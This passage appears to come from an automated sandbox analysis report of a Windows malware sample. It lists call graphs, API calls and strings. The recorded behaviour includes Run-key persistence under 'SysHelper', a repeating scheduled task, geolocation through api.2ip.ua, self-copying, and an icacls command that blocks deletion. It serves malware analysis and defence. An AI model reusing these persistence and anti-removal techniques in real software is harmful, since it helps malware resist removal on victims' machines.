44958->44942 44959->44942 44960->44942 44961->44942 44962->44913 44963->44915 44991 42019c 44964->44991 44966 4227d4 44999 425208 58 API calls __getptd_noexit 44966->44999 44969 4227d9 45000 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44969->45000 44970 4227e9 MultiByteToWideChar 44973 422804 GetLastError 44970->44973 44974 422815 44970->44974 44972 40d7a3 44972->44600 45001 4251e7 58 API calls 2 library calls 44973->45001 45002 428cde 58 API calls 2 library calls 44974->45002 44977 42281d 44978 422810 44977->44978 44979 422825 MultiByteToWideChar 44977->44979 45006 420bed 58 API calls 2 library calls 44978->45006 44979->44973 44980 42283f 44979->44980 45003 428cde 58 API calls 2 library calls 44980->45003 44983 4228a0 45007 420bed 58 API calls 2 library calls 44983->45007 44985 42284a 44985->44978 45004 42d51e 88 API calls 3 library calls 44985->45004 44987 422866 44987->44978 44988 42286f WideCharToMultiByte 44987->44988 44988->44978 44989 42288b GetLastError 44988->44989 45005 4251e7 58 API calls 2 library calls 44989->45005 44992 4201ad 44991->44992 44996 4201fa 44991->44996 45008 425007 58 API calls 2 library calls 44992->45008 44994 4201b3 44995 4201da 44994->44995 45009 4245dc 58 API calls 6 library calls 44994->45009 44995->44996 45010 42495e 58 API calls 6 library calls 44995->45010 44996->44966 44996->44970 44999->44969 45000->44972 45001->44978 45002->44977 45003->44985 45004->44987 45005->44978 45006->44983 45007->44972 45008->44994 45009->44995 45010->44996 45011->44639 45012->44639 45021 427ad7 GetModuleHandleExW 45013->45021 45016->44638 45017->44644 45018->44646 45019->44633 45020->44646 45022 427af0 GetProcAddress 45021->45022 45023 427b07 ExitProcess 45021->45023 45022->45023 45024 427b02 45022->45024 45024->45023 45025->44658 45032 427e1a __wsopen_helper 45031->45032 45033 428af7 __lock 51 API calls 45032->45033 45034 427e21 45033->45034 45035 427eda _doexit 45034->45035 45036 427e4f DecodePointer 45034->45036 45051 427f28 45035->45051 45036->45035 45038 427e66 DecodePointer 45036->45038 45045 427e76 45038->45045 45040 427f37 __wsopen_helper 45040->44348 45042 427f1f 45044 427b0b __lockerr_exit 3 API calls 45042->45044 45043 427e83 EncodePointer 45043->45045 45047 427f28 45044->45047 45045->45035 45045->45043 45046 427e93 DecodePointer EncodePointer 45045->45046 45049 427ea5 DecodePointer DecodePointer 45046->45049 45048 427f35 45047->45048 45056 428c81 LeaveCriticalSection 45047->45056 45048->44348 45049->45045 45052 427f08 45051->45052 45053 427f2e 45051->45053 45052->45040 45055 428c81 LeaveCriticalSection 45052->45055 45057 428c81 LeaveCriticalSection 45053->45057 45055->45042 45056->45048 45057->45052

                                                                                                  Executed Functions

                                                                                                  Function 00419F90 Relevance: 176.6, APIs: 65, Strings: 35, Instructions: 1565COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
                                                                                                    • Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                                                                                    • Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00419FC4
                                                                                                  • GetLastError.KERNEL32 ref: 00419FD2
                                                                                                  • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
                                                                                                  • GetLastError.KERNEL32 ref: 00419FE4
                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,008BAC18,?), ref: 0041A0BB
                                                                                                  • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
                                                                                                  • GetCommandLineW.KERNEL32(?,?), ref: 0041A161
                                                                                                    • Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                                                                                    • Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
                                                                                                    • Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                                                                                  • String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
                                                                                                  • API String ID: 2957410896-3144399390
                                                                                                  • Opcode ID: d015b84eba4a4434be79b711f18dbc426407edb0061b691a0cb40fbdcb0bdc00
                                                                                                  • Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
                                                                                                  • Opcode Fuzzy Hash: d015b84eba4a4434be79b711f18dbc426407edb0061b691a0cb40fbdcb0bdc00
                                                                                                  • Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040D240 Relevance: 58.5, APIs: 25, Strings: 8, Instructions: 702comCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 688 40d240-40d274 CoInitialize 689 40d276-40d278 688->689 690 40d27d-40d2dd CoInitializeSecurity call 414690 CoCreateInstance 688->690 691 40da8e-40da92 689->691 697 40d2e3-40d3ca VariantInit * 4 VariantClear * 4 690->697 698 40da3c-40da44 CoUninitialize 690->698 693 40da94-40da9c call 422587 691->693 694 40da9f-40dab1 691->694 693->694 704 40d3e2-40d3fe call 40b140 697->704 705 40d3cc-40d3dd CoUninitialize 697->705 700 40da69-40da6d 698->700 702 40da7a-40da8a 700->702 703 40da6f-40da77 call 422587 700->703 702->691 703->702 711 40d400-40d402 704->711 712 40d404 704->712 705->700 713 40d406-40d424 call 40b1d0 711->713 712->713 717 40d426-40d437 CoUninitialize 713->717 718 40d43c-40d451 call 40b140 713->718 717->700 722 40d453-40d455 718->722 723 40d457 718->723 724 40d459-40d494 call 40b1d0 722->724 723->724 730 40d496-40d4a7 CoUninitialize 724->730 731 40d4ac-40d4c2 724->731 730->700 734 40d4c8-40d4dd call 40b140 731->734 735 40da2a-40da37 731->735 739 40d4e3 734->739 740 40d4df-40d4e1 734->740 735->698 741 40d4e5-40d508 call 40b1d0 739->741 740->741 741->735 746 40d50e-40d524 741->746 746->735 748 40d52a-40d542 746->748 748->735 751 40d548-40d55e 748->751 751->735 753 40d564-40d57c 751->753 753->735 756 40d582-40d59b 753->756 756->735 758 40d5a1-40d5b6 call 40b140 756->758 761 40d5b8-40d5ba 758->761 762 40d5bc 758->762 763 40d5be-40d5e1 call 40b1d0 761->763 762->763 763->735 768 40d5e7-40d5fd 763->768 768->735 770 40d603-40d626 768->770 770->735 773 40d62c-40d651 770->773 773->735 776 40d657-40d666 773->776 776->735 778 40d66c-40d681 call 40b140 776->778 781 40d683-40d685 778->781 782 40d687 778->782 783 40d689-40d6a3 call 40b1d0 781->783 782->783 783->735 787 40d6a9-40d6be call 40b140 783->787 790 40d6c0-40d6c2 787->790 791 40d6c4 787->791 792 40d6c6-40d6e0 call 40b1d0 790->792 791->792 792->735 796 40d6e6-40d6f4 792->796 796->735 798 40d6fa-40d70f call 40b140 796->798 801 40d711-40d713 798->801 802 40d715 798->802 803 40d717-40d731 call 40b1d0 801->803 802->803 803->735 807 40d737-40d74c call 40b140 803->807 810 40d752 807->810 811 40d74e-40d750 807->811 812 40d754-40d76e call 40b1d0 810->812 811->812 812->735 816 40d774-40d7ce call 423aaf call 423551 call 4228e0 call 412c40 call 412900 812->816 827 40d7d0 816->827 828 40d7d2-40d7e3 call 40b140 816->828 827->828 831 40d7e5-40d7e7 828->831 832 40d7e9 828->832 833 40d7eb-40d819 call 40b1d0 call 413210 831->833 832->833 833->735 840 40d81f-40d835 833->840 840->735 842 40d83b-40d85e 840->842 842->735 845 40d864-40d889 842->845 845->735 848 40d88f-40d8ab call 40b140 845->848 851 40d8b1 848->851 852 40d8ad-40d8af 848->852 853 40d8b3-40d8cd call 40b1d0 851->853 852->853 857 40d8dd-40d8f2 call 40b140 853->857 858 40d8cf-40d8d8 853->858 862 40d8f4-40d8f6 857->862 863 40d8f8 857->863 858->735 864 40d8fa-40d91d call 40b1d0 862->864 863->864 864->735 869 40d923-40d98d call 40b400 VariantInit * 2 call 40b140 864->869 874 40d993 869->874 875 40d98f-40d991 869->875 876 40d995-40da0e call 40b1d0 VariantClear * 3 874->876 875->876 880 40da10-40da27 call 42052a 876->880 881 40da46-40da67 CoUninitialize 876->881 880->735 881->700
                                                                                                  APIs
                                                                                                  • CoInitialize.OLE32(00000000), ref: 0040D26C
                                                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0040D28F
                                                                                                  • CoCreateInstance.OLE32(004D506C,00000000,00000001,004D4FEC,?,?,00000000,000000FF), ref: 0040D2D5
                                                                                                  • VariantInit.OLEAUT32(?), ref: 0040D2F0
                                                                                                  • VariantInit.OLEAUT32(?), ref: 0040D309
                                                                                                  • VariantInit.OLEAUT32(?), ref: 0040D322
                                                                                                  • VariantInit.OLEAUT32(?), ref: 0040D33B
                                                                                                  • VariantClear.OLEAUT32(?), ref: 0040D397
                                                                                                  • VariantClear.OLEAUT32(?), ref: 0040D3A4
                                                                                                  • VariantClear.OLEAUT32(?), ref: 0040D3B1
                                                                                                  • VariantClear.OLEAUT32(?), ref: 0040D3C2
                                                                                                  • CoUninitialize.OLE32 ref: 0040D3D5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
                                                                                                  • String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
                                                                                                  • API String ID: 2496729271-1738591096
                                                                                                  • Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                                  • Instruction ID: 4ad9c2e8017b41c765d67f99bb49247a0c13fc41f24acee5688789d455a97b09
                                                                                                  • Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                                  • Instruction Fuzzy Hash: 05526F70E00219DFDB10DFA8C858FAEBBB4EF49304F1481A9E505BB291DB74AD49CB95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00412220 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 116libraryloaderCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetCommandLineW.KERNEL32 ref: 00412235
                                                                                                  • CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
                                                                                                  • PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
                                                                                                  • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
                                                                                                  • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
                                                                                                  • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
                                                                                                  • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
                                                                                                  • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00412347
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                                  • API String ID: 3668891214-3807497772
                                                                                                  • Opcode ID: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                                                                                                  • Instruction ID: 197cd9f83d52dd112842658ec983a676e251e24b3cd7e802a51fbc3a937a58d5
                                                                                                  • Opcode Fuzzy Hash: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                                                                                                  • Instruction Fuzzy Hash: A3315371E0021DAFDB11AFE5DC45EEEBBB8FF45704F04406AF904E2190DA749A418FA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040CF10 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 228networkfileCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 903 40cf10-40cfb0 call 42f7c0 call 42b420 InternetOpenW call 415c10 InternetOpenUrlW 910 40cfb2-40cfb4 903->910 911 40cfb9-40cffb InternetReadFile InternetCloseHandle * 2 call 4156d0 903->911 912 40d213-40d217 910->912 916 40d000-40d01d 911->916 914 40d224-40d236 912->914 915 40d219-40d221 call 422587 912->915 915->914 918 40d023-40d02c 916->918 919 40d01f-40d021 916->919 922 40d030-40d035 918->922 921 40d039-40d069 call 4156d0 call 414300 919->921 928 40d1cb 921->928 929 40d06f-40d08b call 413010 921->929 922->922 923 40d037 922->923 923->921 931 40d1cd-40d1d1 928->931 935 40d0b9-40d0bd 929->935 936 40d08d-40d091 929->936 933 40d1d3-40d1db call 422587 931->933 934 40d1de-40d1f4 931->934 933->934 938 40d201-40d20f 934->938 939 40d1f6-40d1fe call 422587 934->939 943 40d0cd-40d0e1 call 414300 935->943 944 40d0bf-40d0ca call 422587 935->944 940 40d093-40d09b call 422587 936->940 941 40d09e-40d0b4 call 413d40 936->941 938->912 939->938 940->941 941->935 943->928 954 40d0e7-40d149 call 413010 943->954 944->943 957 40d150-40d15a 954->957 958 40d160-40d162 957->958 959 40d15c-40d15e 957->959 961 40d165-40d16a 958->961 960 40d16e-40d18b call 40b650 959->960 965 40d19a-40d19e 960->965 966 40d18d-40d18f 960->966 961->961 962 40d16c 961->962 962->960 965->957 967 40d1a0 965->967 966->965 968 40d191-40d198 966->968 969 40d1a2-40d1a6 967->969 968->965 970 40d1c7-40d1c9 968->970 971 40d1b3-40d1c5 969->971 972 40d1a8-40d1b0 call 422587 969->972 970->969 971->931 972->971
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 0040CF4A
                                                                                                  • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                                                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                                                                                  • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040CFDA
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040CFDD
                                                                                                  Strings
                                                                                                  • "country_code":", xrefs: 0040CFE1
                                                                                                  • Microsoft Internet Explorer, xrefs: 0040CF5A
                                                                                                  • https://api.2ip.ua/geo.json, xrefs: 0040CF79
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                                  • String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                                  • API String ID: 1485416377-2962370585
                                                                                                  • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                  • Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
                                                                                                  • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                  • Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00411CD0 Relevance: 79.1, APIs: 36, Strings: 9, Instructions: 382stringregistrylibraryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 606 411cd0-411d1a call 42f7c0 RegOpenKeyExW 609 411d20-411d8d call 42b420 RegQueryValueExW RegCloseKey 606->609 610 412207-412216 606->610 613 411d93-411d9c 609->613 614 411d8f-411d91 609->614 616 411da0-411da9 613->616 615 411daf-411dcb call 415c10 614->615 620 411dd1-411df8 lstrlenA call 413520 615->620 621 411e7c-411e87 615->621 616->616 617 411dab-411dad 616->617 617->615 629 411e28-411e2c 620->629 630 411dfa-411dfe 620->630 623 411e94-411f34 LoadLibraryW GetProcAddress GetCommandLineW CommandLineToArgvW lstrcpyW PathFindFileNameW UuidCreate UuidToStringW 621->623 624 411e89-411e91 call 422587 621->624 633 411f36-411f38 623->633 634 411f3a-411f3f 623->634 624->623 631 411e3c-411e50 PathFileExistsW 629->631 632 411e2e-411e39 call 422587 629->632 635 411e00-411e08 call 422587 630->635 636 411e0b-411e23 call 4145a0 630->636 631->621 641 411e52-411e57 631->641 632->631 639 411f4f-411f96 call 415c10 RpcStringFreeW PathAppendW CreateDirectoryW 633->639 640 411f40-411f49 634->640 635->636 636->629 653 411f98-411fa0 639->653 654 411fce-411fe9 639->654 640->640 644 411f4b-411f4d 640->644 645 411e59-411e5e 641->645 646 411e6a-411e6e 641->646 644->639 645->646 649 411e60-411e65 call 414690 645->649 646->610 651 411e74-411e77 646->651 649->646 655 4121ff-412204 call 422587 651->655 658 411fa2-411fa4 653->658 659 411fa6-411faf 653->659 656 411feb-411fed 654->656 657 411fef-411ff8 654->657 655->610 661 41200f-412076 call 415c10 PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 656->661 662 412000-412009 657->662 663 411fbf-411fc9 call 415c10 658->663 665 411fb0-411fb9 659->665 671 4121d1-4121d5 661->671 672 41207c-412107 call 42b420 lstrcpyW lstrcatW * 2 lstrlenW RegSetValueExW RegCloseKey 661->672 662->662 667 41200b-41200d 662->667 663->654 665->665 669 411fbb-411fbd 665->669 667->661 669->663 673 4121e2-4121fa 671->673 674 4121d7-4121df call 422587 671->674 680 412115-4121a8 call 42b420 SetLastError lstrcpyW lstrcatW * 2 CreateProcessW 672->680 681 412109-412110 call 413260 672->681 673->610 677 4121fc 673->677 674->673 677->655 685 4121b2-4121b8 680->685 686 4121aa-4121b0 GetLastError 680->686 681->680 687 4121c0-4121cf WaitForSingleObject 685->687 686->671 687->671 687->687
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                                                                                                  • _memset.LIBCMT ref: 00411D3B
                                                                                                  • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                                                                                                  • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                                                                                                  • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                                                                                                  • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00411E99
                                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00411EA5
                                                                                                  • GetCommandLineW.KERNEL32 ref: 00411EB4
                                                                                                  • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00411EBF
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 00411ECE
                                                                                                  • PathFindFileNameW.SHLWAPI(?), ref: 00411EDB
                                                                                                  • UuidCreate.RPCRT4(?), ref: 00411EFC
                                                                                                  • UuidToStringW.RPCRT4(?,?), ref: 00411F14
                                                                                                  • RpcStringFreeW.RPCRT4(00000000), ref: 00411F64
                                                                                                  • PathAppendW.SHLWAPI(?,?), ref: 00411F83
                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00411F8E
                                                                                                  • PathAppendW.SHLWAPI(?,?,?,?), ref: 0041202D
                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00412036
                                                                                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0041204C
                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0041206E
                                                                                                  • _memset.LIBCMT ref: 00412090
                                                                                                  • lstrcpyW.KERNEL32(?,005002FC), ref: 004120AA
                                                                                                  • lstrcatW.KERNEL32(?,?), ref: 004120C0
                                                                                                  • lstrcatW.KERNEL32(?," --AutoStart), ref: 004120CE
                                                                                                  • lstrlenW.KERNEL32(?), ref: 004120D7
                                                                                                  • RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004120F3
                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 004120FC
                                                                                                  • _memset.LIBCMT ref: 00412120
                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00412146
                                                                                                  • lstrcpyW.KERNEL32(?,icacls "), ref: 00412158
                                                                                                  • lstrcatW.KERNEL32(?,?), ref: 0041216D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                                                                                  • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                                                                                  • API String ID: 2589766509-1182136429
                                                                                                  • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                  • Instruction ID: 715e32bd1e023583792331b7dbf49be96a7b9f80df69a50876529e1503cb0a0b
                                                                                                  • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                  • Instruction Fuzzy Hash: 51E14171D00219EBDF24DBA0DD89FEE77B8BF04304F14416AE609E6191EB786A85CF58
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00423576 Relevance: 15.3, APIs: 10, Instructions: 258COMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 975 423576-42358f 976 423591-42359b call 425208 call 4242d2 975->976 977 4235a9-4235be call 42b420 975->977 984 4235a0 976->984 977->976 983 4235c0-4235c3 977->983 985 4235d7-4235dd 983->985 986 4235c5 983->986 991 4235a2-4235a8 984->991 989 4235e9 call 42fb64 985->989 990 4235df 985->990 987 4235c7-4235c9 986->987 988 4235cb-4235d5 call 425208 986->988 987->985 987->988 988->984 996 4235ee-4235fa call 42f803 989->996 990->988 993 4235e1-4235e7 990->993 993->988 993->989 999 423600-42360c call 42f82d 996->999 1000 4237e5-4237ef call 4242fd 996->1000 999->1000 1005 423612-42361e call 42f857 999->1005 1005->1000 1008 423624-42362b 1005->1008 1009 42369b-4236a6 call 42f939 1008->1009 1010 42362d 1008->1010 1009->991 1016 4236ac-4236af 1009->1016 1012 423637-423653 call 42f939 1010->1012 1013 42362f-423635 1010->1013 1012->991 1020 423659-42365c 1012->1020 1013->1009 1013->1012 1018 4236b1-4236ba call 42fbb4 1016->1018 1019 4236de-4236eb 1016->1019 1018->1019 1028 4236bc-4236dc 1018->1028 1022 4236ed-4236fc call 4305a0 1019->1022 1023 423662-42366b call 42fbb4 1020->1023 1024 42379e-4237a0 1020->1024 1031 423709-423730 call 4304f0 call 4305a0 1022->1031 1032 4236fe-423706 1022->1032 1023->1024 1033 423671-423689 call 42f939 1023->1033 1024->991 1028->1022 1041 423732-42373b 1031->1041 1042 42373e-423765 call 4304f0 call 4305a0 1031->1042 1032->1031 1033->991 1039 42368f-423696 1033->1039 1039->1024 1041->1042 1047 423773-423782 call 4304f0 1042->1047 1048 423767-423770 1042->1048 1051 423784 1047->1051 1052 4237af-4237c8 1047->1052 1048->1047 1055 423786-423788 1051->1055 1056 42378a-423798 1051->1056 1053 4237ca-4237e3 1052->1053 1054 42379b 1052->1054 1053->1024 1054->1024 1055->1056 1057 4237a5-4237a7 1055->1057 1056->1054 1057->1024 1058 4237a9 1057->1058 1058->1052 1059 4237ab-4237ad 1058->1059 1059->1024 1059->1052
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 004235B1
                                                                                                    • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                  • __gmtime64_s.LIBCMT ref: 0042364A
                                                                                                  • __gmtime64_s.LIBCMT ref: 00423680
                                                                                                  • __gmtime64_s.LIBCMT ref: 0042369D
                                                                                                  • __allrem.LIBCMT ref: 004236F3
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
                                                                                                  • __allrem.LIBCMT ref: 00423726
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
                                                                                                  • __allrem.LIBCMT ref: 0042375B
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779
                                                                                                  Memory Dump Source
